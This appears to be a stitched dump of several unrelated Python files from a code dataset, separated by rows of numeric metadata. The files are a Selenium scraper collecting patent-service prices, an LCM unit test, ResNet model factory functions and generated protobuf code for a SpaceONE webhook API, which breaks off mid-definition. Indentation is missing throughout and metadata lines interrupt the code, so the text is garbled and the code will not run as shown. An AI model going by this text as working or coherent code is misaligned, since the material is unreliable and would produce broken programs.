for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 业务类型选择
for num in range(1, 3):
if self.dboperate.is_member(type_code[index], num):
self.common.driver.find_element_by_xpath(
".//ul[@p='{}']/li[{}]/a".format(ul_index[index], num)).click()
case_name = self.common.driver.find_element_by_xpath(
".//ul[@p='{}']/li[{}]/a".format(ul_index[index], num)).text
case_name = "-".join((patent_type, case_name))
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 7著录项目变更
def patent_description(self):
all_type = [u'著录项目变更']
type_code = ["description"]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
all_direction = [[1], [2], [3], [1, 2], [1, 3], [2, 3], [1, 2, 3]]
# =========随机选择一种类型===========
random_type = random.choice(all_direction)
random_index = all_direction.index(random_type)
all_direction = [random_type]
# ===================================
for index_2, num in enumerate(all_direction):
case_type = [str(patent_type)]
for temp in num:
# 业务类型选择
if temp == 1:
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ul1']/li[1]/a").text
case_type.append(case_name1)
else:
self.common.driver.find_element_by_xpath(".//ul[@id='ul1']/li[{}]/a".format(temp)).click()
case_name1 = self.common.driver.find_element_by_xpath(
".//ul[@id='ul1']/li[{}]/a".format(temp)).text
case_type.append(case_name1)
case_name = "-".join(case_type)
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
# 判断价格是否加载成功
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
# 使用随机选择类型时,index_2改为random_index
self.dboperate.del_elem(type_code[index], random_index)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 8 代缴专利年费
def patent_replace(self):
all_type = [u'代缴专利年费']
for patent_type in all_type:
if self.dboperate.is_member(self.db, patent_type):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
case_name = str(patent_type)
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(self.db, patent_type)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
except Exception as e:
print('错误信息', e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
# 9 PCT 国际申请-- 特殊处理
def patent_PCT(self):
all_type = [u'PCT国际申请']
for patent_type in all_type:
if self.dboperate.is_member(self.db, patent_type):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 判断价格是否加载成功
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
case_name = str(patent_type)
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(self.db, patent_type)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
except Exception as e:
print('错误信息', e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
# 10 共用部分
def patent_common(self):
all_type = [u'电商侵权处理', u'专利权恢复', u'专利实施许可备案', u'专利质押备案', u'集成电路布图设计']
for patent_type in all_type:
if self.dboperate.is_member(self.db, patent_type):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 判断价格是否加载成功
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
case_name = patent_type
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(self.db, patent_type)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
except Exception as e:
print('错误信息', e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
| 55.940075
| 124
| 0.49374
| 3,173
| 29,872
| 4.431768
| 0.072487
| 0.124449
| 0.157019
| 0.118049
| 0.865453
| 0.851728
| 0.847888
| 0.839283
| 0.833452
| 0.83075
| 0
| 0.013592
| 0.379318
| 29,872
| 533
| 125
| 56.045028
| 0.744836
| 0.044189
| 0
| 0.776413
| 0
| 0
| 0.098496
| 0.059983
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031941
| false
| 0
| 0.031941
| 0
| 0.071253
| 0.051597
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0372e347ea3f86dbf50b7a6a3e388b2ad658bc82
| 120
|
py
|
Python
|
tests/test_lcm.py
|
bashirk/lcmfinda
|
da57e9127367cdd2b24fbb351dc478b2318a2882
|
[
"MIT"
] | null | null | null |
tests/test_lcm.py
|
bashirk/lcmfinda
|
da57e9127367cdd2b24fbb351dc478b2318a2882
|
[
"MIT"
] | null | null | null |
tests/test_lcm.py
|
bashirk/lcmfinda
|
da57e9127367cdd2b24fbb351dc478b2318a2882
|
[
"MIT"
] | null | null | null |
from lcm import cal_lcm
def test_a():
assert cal_lcm(10, 20) == 20
def test_b():
assert cal_lcm(10, 15) == 30
| 15
| 32
| 0.633333
| 23
| 120
| 3.086957
| 0.565217
| 0.253521
| 0.338028
| 0.394366
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 0.233333
| 120
| 7
| 33
| 17.142857
| 0.641304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
301a5bf86906325179b8850943cb7081fb41541f
| 2,980
|
py
|
Python
|
modules/nets.py
|
AlexKhakhlyuk/fixedconv
|
bf3848c3fd60af2e617f2118064ee6f551b45d95
|
[
"Apache-1.1"
] | 1
|
2020-05-05T07:20:25.000Z
|
2020-05-05T07:20:25.000Z
|
modules/nets.py
|
khakhlyuk/fixedconv
|
bf3848c3fd60af2e617f2118064ee6f551b45d95
|
[
"Apache-1.1"
] | null | null | null |
modules/nets.py
|
khakhlyuk/fixedconv
|
bf3848c3fd60af2e617f2118064ee6f551b45d95
|
[
"Apache-1.1"
] | null | null | null |
from modules.resnet import *
from modules.preact_resnet import *
def mini_convnet(num_classes=10):
return MiniConvNet(num_classes)
def resnet20(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [3, 3, 3],
num_classes, k, fixed, fully_fixed)
def resnet32(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [5, 5, 5],
num_classes, k, fixed, fully_fixed)
def resnet44(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [7, 7, 7],
num_classes, k, fixed, fully_fixed)
def resnet56(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [9, 9, 9],
num_classes, k, fixed, fully_fixed)
def resnet110(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [18, 18, 18],
num_classes, k, fixed, fully_fixed)
def resnet1202(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BasicBlock, [200, 200, 200],
num_classes, k, fixed, fully_fixed)
def resnet164(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BottleneckBlock, [18, 18, 18],
num_classes, k, fixed, fully_fixed)
def resnet1001(num_classes=10, k=1, fixed=False, fully_fixed=False):
return ResNet(BottleneckBlock, [111, 111, 111],
num_classes, k, fixed, fully_fixed)
def preact_resnet20(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [3, 3, 3],
num_classes, k, fixed, fully_fixed)
def preact_resnet32(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [5, 5, 5],
num_classes, k, fixed, fully_fixed)
def preact_resnet44(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [7, 7, 7],
num_classes, k, fixed, fully_fixed)
def preact_resnet56(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [9, 9, 9],
num_classes, k, fixed, fully_fixed)
def preact_resnet110(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [18, 18, 18],
num_classes, k, fixed, fully_fixed)
def preact_resnet1202(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBasicBlock, [200, 200, 200],
num_classes, k, fixed, fully_fixed)
def preact_resnet164(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBottleneckBlock, [18, 18, 18],
num_classes, k, fixed, fully_fixed)
def preact_resnet1001(num_classes=10, k=1, fixed=False, fully_fixed=False):
return PreActResNet(PreActBottleneckBlock, [111, 111, 111],
num_classes, k, fixed, fully_fixed)
| 34.651163
| 75
| 0.674161
| 411
| 2,980
| 4.703163
| 0.092457
| 0.175892
| 0.105535
| 0.107605
| 0.944128
| 0.944128
| 0.944128
| 0.944128
| 0.923952
| 0.887739
| 0
| 0.075584
| 0.209732
| 2,980
| 86
| 76
| 34.651163
| 0.745223
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326923
| false
| 0
| 0.038462
| 0.326923
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
307ca93dff9f74315f429f60a9b5d25191b0d3fd
| 46,153
|
py
|
Python
|
venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/webhook_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/webhook_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/webhook_pb2.py
|
choonho/plugin-prometheus-mon-webhook
|
afa7d65d12715fd0480fb4f92a9c62da2d6128e0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: spaceone/api/monitoring/v1/webhook.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from spaceone.api.core.v1 import query_pb2 as spaceone_dot_api_dot_core_dot_v1_dot_query__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='spaceone/api/monitoring/v1/webhook.proto',
package='spaceone.api.monitoring.v1',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n(spaceone/api/monitoring/v1/webhook.proto\x12\x1aspaceone.api.monitoring.v1\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1cgoogle/protobuf/struct.proto\x1a\x1cgoogle/api/annotations.proto\x1a spaceone/api/core/v1/query.proto\"\x8c\x02\n\x11WebhookPluginInfo\x12\x11\n\tplugin_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12)\n\x08metadata\x18\x04 \x01(\x0b\x32\x17.google.protobuf.Struct\x12O\n\x0cupgrade_mode\x18\x05 \x01(\x0e\x32\x39.spaceone.api.monitoring.v1.WebhookPluginInfo.UpgradeMode\"-\n\x0bUpgradeMode\x12\x08\n\x04NONE\x10\x00\x12\n\n\x06MANUAL\x10\x01\x12\x08\n\x04\x41UTO\x10\x02\"\xb6\x01\n\x14\x43reateWebhookRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x42\n\x0bplugin_info\x18\x02 \x01(\x0b\x32-.spaceone.api.monitoring.v1.WebhookPluginInfo\x12%\n\x04tags\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x12\n\nproject_id\x18\x0b \x01(\t\x12\x11\n\tdomain_id\x18\x0c \x01(\t\"r\n\x14UpdateWebhookRequest\x12\x12\n\nwebhook_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12%\n\x04tags\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x11\n\tdomain_id\x18\x0b \x01(\t\"\x87\x02\n\x1aUpdateWebhookPluginRequest\x12\x12\n\nwebhook_id\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12(\n\x07options\x18\x03 \x01(\x0b\x32\x17.google.protobuf.Struct\x12X\n\x0cupgrade_mode\x18\x04 \x01(\x0e\x32\x42.spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.UpgradeMode\x12\x11\n\tdomain_id\x18\x0b \x01(\t\"-\n\x0bUpgradeMode\x12\x08\n\x04NONE\x10\x00\x12\n\n\x06MANUAL\x10\x01\x12\x08\n\x04\x41UTO\x10\x02\"7\n\x0eWebhookRequest\x12\x12\n\nwebhook_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\"H\n\x11GetWebhookRequest\x12\x12\n\nwebhook_id\x18\x01 \x01(\t\x12\x11\n\tdomain_id\x18\x02 \x01(\t\x12\x0c\n\x04only\x18\x03 \x03(\t\"\xa7\x02\n\x0cWebhookQuery\x12*\n\x05query\x18\x01 \x01(\x0b\x32\x1b.spaceone.api.core.v1.Query\x12\x12\n\nwebhook_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x44\n\x05state\x18\x04 \x01(\x0e\x32\x35.spaceone.api.monitoring.v1.WebhookQuery.WebhookState\x12\x12\n\naccess_key\x18\x05 \x01(\t\x12\x13\n\x0bwebhook_url\x18\x06 \x01(\t\x12\x12\n\nproject_id\x18\x07 \x01(\t\x12\x11\n\tdomain_id\x18\x0b \x01(\t\"3\n\x0cWebhookState\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45NABLED\x10\x01\x12\x0c\n\x08\x44ISABLED\x10\x02\"\xa5\x03\n\x0bWebhookInfo\x12\x12\n\nwebhook_id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x43\n\x05state\x18\x03 \x01(\x0e\x32\x34.spaceone.api.monitoring.v1.WebhookInfo.WebhookState\x12\x12\n\naccess_key\x18\x04 \x01(\t\x12\x13\n\x0bwebhook_url\x18\x05 \x01(\t\x12+\n\ncapability\x18\x06 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x42\n\x0bplugin_info\x18\x07 \x01(\x0b\x32-.spaceone.api.monitoring.v1.WebhookPluginInfo\x12%\n\x04tags\x18\x08 \x01(\x0b\x32\x17.google.protobuf.Struct\x12\x12\n\nproject_id\x18\x0b \x01(\t\x12\x11\n\tdomain_id\x18\x0c \x01(\t\x12\x12\n\ncreated_at\x18\x15 \x01(\t\"3\n\x0cWebhookState\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45NABLED\x10\x01\x12\x0c\n\x08\x44ISABLED\x10\x02\"]\n\x0cWebhooksInfo\x12\x38\n\x07results\x18\x01 \x03(\x0b\x32\'.spaceone.api.monitoring.v1.WebhookInfo\x12\x13\n\x0btotal_count\x18\x02 \x01(\x05\"[\n\x10WebhookStatQuery\x12\x34\n\x05query\x18\x01 \x01(\x0b\x32%.spaceone.api.core.v1.StatisticsQuery\x12\x11\n\tdomain_id\x18\x02 \x01(\t2\xae\x0b\n\x07Webhook\x12\x84\x01\n\x06\x63reate\x12\x30.spaceone.api.monitoring.v1.CreateWebhookRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"\x1f\x82\xd3\xe4\x93\x02\x19\"\x17/monitoring/v1/webhooks\x12\x90\x01\n\x06update\x12\x30.spaceone.api.monitoring.v1.UpdateWebhookRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"+\x82\xd3\xe4\x93\x02%\x1a#/monitoring/v1/webhook/{webhook_id}\x12\xa4\x01\n\rupdate_plugin\x12\x36.spaceone.api.monitoring.v1.UpdateWebhookPluginRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"2\x82\xd3\xe4\x93\x02,\x1a*/monitoring/v1/webhook/{webhook_id}/plugin\x12\x9a\x01\n\rverify_plugin\x12\x36.spaceone.api.monitoring.v1.UpdateWebhookPluginRequest\x1a\x16.google.protobuf.Empty\"9\x82\xd3\xe4\x93\x02\x33\"1/monitoring/v1/webhook/{webhook_id}/plugin/verify\x12\x91\x01\n\x06\x65nable\x12*.spaceone.api.monitoring.v1.WebhookRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"2\x82\xd3\xe4\x93\x02,\x1a*/monitoring/v1/webhook/{webhook_id}/enable\x12\x93\x01\n\x07\x64isable\x12*.spaceone.api.monitoring.v1.WebhookRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"3\x82\xd3\xe4\x93\x02-\x1a+/monitoring/v1/webhook/{webhook_id}/disable\x12y\n\x06\x64\x65lete\x12*.spaceone.api.monitoring.v1.WebhookRequest\x1a\x16.google.protobuf.Empty\"+\x82\xd3\xe4\x93\x02%*#/monitoring/v1/webhook/{webhook_id}\x12\x8a\x01\n\x03get\x12-.spaceone.api.monitoring.v1.GetWebhookRequest\x1a\'.spaceone.api.monitoring.v1.WebhookInfo\"+\x82\xd3\xe4\x93\x02%\x12#/monitoring/v1/webhook/{webhook_id}\x12\x9d\x01\n\x04list\x12(.spaceone.api.monitoring.v1.WebhookQuery\x1a(.spaceone.api.monitoring.v1.WebhooksInfo\"A\x82\xd3\xe4\x93\x02;\x12\x17/monitoring/v1/webhooksZ \"\x1e/monitoring/v1/webhooks/search\x12s\n\x04stat\x12,.spaceone.api.monitoring.v1.WebhookStatQuery\x1a\x17.google.protobuf.Struct\"$\x82\xd3\xe4\x93\x02\x1e\"\x1c/monitoring/v1/webhooks/statb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,spaceone_dot_api_dot_core_dot_v1_dot_query__pb2.DESCRIPTOR,])
_WEBHOOKPLUGININFO_UPGRADEMODE = _descriptor.EnumDescriptor(
name='UpgradeMode',
full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.UpgradeMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MANUAL', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='AUTO', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=419,
serialized_end=464,
)
_sym_db.RegisterEnumDescriptor(_WEBHOOKPLUGININFO_UPGRADEMODE)
_UPDATEWEBHOOKPLUGINREQUEST_UPGRADEMODE = _descriptor.EnumDescriptor(
name='UpgradeMode',
full_name='spaceone.api.monitoring.v1.UpdateWebhookPluginRequest.UpgradeMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MANUAL', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='AUTO', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=419,
serialized_end=464,
)
_sym_db.RegisterEnumDescriptor(_UPDATEWEBHOOKPLUGINREQUEST_UPGRADEMODE)
_WEBHOOKQUERY_WEBHOOKSTATE = _descriptor.EnumDescriptor(
name='WebhookState',
full_name='spaceone.api.monitoring.v1.WebhookQuery.WebhookState',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ENABLED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DISABLED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=1409,
serialized_end=1460,
)
_sym_db.RegisterEnumDescriptor(_WEBHOOKQUERY_WEBHOOKSTATE)
_WEBHOOKINFO_WEBHOOKSTATE = _descriptor.EnumDescriptor(
name='WebhookState',
full_name='spaceone.api.monitoring.v1.WebhookInfo.WebhookState',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='ENABLED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DISABLED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=1409,
serialized_end=1460,
)
_sym_db.RegisterEnumDescriptor(_WEBHOOKINFO_WEBHOOKSTATE)
_WEBHOOKPLUGININFO = _descriptor.Descriptor(
name='WebhookPluginInfo',
full_name='spaceone.api.monitoring.v1.WebhookPluginInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='plugin_id', full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.plugin_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='options', full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.options', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='metadata', full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.metadata', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='upgrade_mode', full_name='spaceone.api.monitoring.v1.WebhookPluginInfo.upgrade_mode', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_WEBHOOKPLUGININFO_UPGRADEMODE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=196,
serialized_end=464,
)
_CREATEWEBHOOKREQUEST = _descriptor.Descriptor(
name='CreateWebhookRequest',
full_name='spaceone.api.monitoring.v1.CreateWebhookRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='spaceone.api.monitoring.v1.CreateWebhookRequest.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='plugin_info', full_name='spaceone.api.monitoring.v1.CreateWebhookRequest.plugin_info', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='spaceone.api.monitoring.v1.CreateWebhookRequest.tags', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='project_id', full_name='spaceone.api.monitoring.v1.CreateWebhookRequest.project_id', index=3,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='domain_id', full_name='spaceone.api.monitoring.v1.CreateWebhookRequest.domain_id', index=4,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
